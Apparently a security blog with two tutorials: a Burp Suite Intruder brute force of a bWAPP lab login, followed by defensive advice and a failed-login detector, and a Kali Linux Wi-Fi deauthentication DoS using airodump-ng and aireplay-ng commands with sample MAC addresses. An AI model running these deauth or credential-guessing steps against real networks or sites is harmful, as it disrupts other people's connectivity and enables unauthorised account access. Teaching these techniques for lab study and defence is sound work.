06 April 2021

Brute Force Attack

A brute force attack is a popular cracking method that tries usernames and passwords one by one in a short time using a machine or tool. Here I am going to show how to brute force a website login with the tool Burp Suite, to find out which user and password match the ones in the database the web app uses.

Step 1. Access the bWAPP website that has been installed in your lab and enter a wrong user and password to see what response the web app gives. Now we know the response keyword is Invalid.



Step 2. Enter the user and password again with intercept turned on in Burp Suite. After the traffic has been intercepted, right-click and select Send to Intruder.



Step 3. The default will look like this



Step 4. Now we change it as in the picture below
Attack Type : Cluster Bomb
Login       : $admin$
Password    : $admin$



Step 5. Click the Payloads tab; this payload set is for users
Payload set     : 1
Payload type    : Simple List
Payload Options : (add all users, or if you have a wordlist, upload it to Burp Suite)



Step 6. Stay in the Payloads tab; this payload set is for passwords
Payload set     : 2
Payload type    : Simple List
Payload Options : (add all passwords, or if you have a wordlist, upload it to Burp Suite)



Step 8. Click the Options tab, look at Grep Match, add the response of the web app (example: Invalid), and then click Start Attack.



Step 9. Burp Suite will check the users and passwords one by one. If a user and password match, Invalid will show as unchecked for that request, because the web app's response does not contain the keyword Invalid.



Step 10. Now we try to log in to the web app, and the result is that we can log in using user : bee and password : bug


If you have a website and want to prevent this attack, you can use a WAF or a CAPTCHA. When brute force traffic hits your website, a WAF or CAPTCHA can identify it as brute force, for example when a user tries to log in with wrong credentials 5 times in a row within 1 minute, and then block the traffic or show the CAPTCHA challenge.
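The threshold rule described above (5 wrong logins in a row within 1 minute), as an added example that is not part of the original post and is not how any particular WAF implements it. The log format, the sample lines and the name `detect_bruteforce` are assumptions made for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

MAX_FAILURES = 5               # rule from the text: 5 wrong logins in a row
WINDOW = timedelta(minutes=1)  # ... within 1 minute

# Constructed sample log (assumed format): timestamp, client IP, user, result
SAMPLE_LOG = """\
2021-04-06T10:00:01 203.0.113.7 admin FAIL
2021-04-06T10:00:03 203.0.113.7 admin FAIL
2021-04-06T10:00:05 203.0.113.7 root FAIL
2021-04-06T10:00:07 203.0.113.7 root FAIL
2021-04-06T10:00:09 203.0.113.7 test FAIL
2021-04-06T10:00:10 198.51.100.20 alice FAIL
2021-04-06T10:00:15 198.51.100.20 alice FAIL
2021-04-06T10:00:20 198.51.100.20 alice OK
2021-04-06T10:00:30 198.51.100.20 alice FAIL
2021-04-06T10:00:35 198.51.100.20 alice FAIL
2021-04-06T10:00:40 198.51.100.20 alice FAIL
2021-04-06T10:02:00 192.0.2.50 carol FAIL
2021-04-06T10:02:25 192.0.2.50 carol FAIL
2021-04-06T10:02:50 192.0.2.50 carol FAIL
2021-04-06T10:03:15 192.0.2.50 carol FAIL
2021-04-06T10:03:40 192.0.2.50 carol FAIL
"""

def detect_bruteforce(lines, max_failures=MAX_FAILURES, window=WINDOW):
    """Return (ip, time) for each point where a client hits the threshold."""
    streak = defaultdict(deque)  # client IP -> times of consecutive failures
    alerts = []
    for line in filter(str.strip, lines):  # skip blank lines
        ts_text, ip, _user, result = line.split()
        ts = datetime.fromisoformat(ts_text)
        fails = streak[ip]
        if result == "OK":
            fails.clear()        # "in a row": a successful login ends the streak
            continue
        fails.append(ts)
        while ts - fails[0] > window:
            fails.popleft()      # forget failures older than the window
        if len(fails) >= max_failures:
            alerts.append((ip, ts))  # here a WAF would block or show the CAPTCHA
            fails.clear()
    return alerts

if __name__ == "__main__":
    for ip, ts in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{ts.isoformat()} block or challenge {ip}")
```

The count is kept per client IP rather than per username because the Cluster Bomb attack above cycles through many usernames from one source.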


Thank You

04 April 2021

How to DOS Attack Wifi

In this section I want to share how to DoS attack Wi-Fi using Kali Linux. This article is only for learning and knowledge, or for when we want to kick users off your Wi-Fi network. First we need Kali Linux installed on a Raspberry Pi or a VM; if using a VM we need an external Wi-Fi adapter. Once Kali Linux is installed, we access Kali Linux and log in.

Step 1. Open a terminal and type #iwconfig; this command checks your Wi-Fi interface


Step 2. Type #airmon-ng start wlan0 to change the mode to Monitor


Step 3. In this step we pick out the specific wireless SSID we want to attack by typing #airodump-ng (name of your wireless interface), for example #airodump-ng wlan0mon


Step 4. Continuing from step 3, type #airodump-ng --channel (Channel of Access Point under CH) --bssid (BSSID Mac Address from Access Point) (name of your interface), for example #airodump-ng --channel 6 --bssid E4:47:B3:94:F6:8E wlan0mon, and we can see the clients connected to the Wi-Fi BaCan under the Station tab


Step 5. For the last step we start the DoS attack on the Wi-Fi we have chosen. There are 2 ways: we can attack all clients or a specific client to kick them off the Wi-Fi network. If we want to kick all clients off the Wi-Fi network, type #aireplay-ng -0 0 -a (Mac Address of Access Point) (Name of your interface), example #aireplay-ng -0 0 -a E4:47:B3:94:F6:8E wlan0mon

If we want to target a specific client, we need to type #aireplay-ng --deauth 2000 -a (Mac Address of Access Point) -c (Mac Address of Client) (Name of your interface)
example #aireplay-ng --deauth 2000 -a E4:47:B3:94:F6:8E -c 18:26:77:00:B8:71 wlan0mon
After running that command, we check whether the client that was connected to the Wi-Fi is still connected or has been disconnected. If you want to check on Kali Linux, just type the command
#airodump-ng --channel 6 --bssid E4:47:B3:94:F6:8E wlan0mon


THANK YOU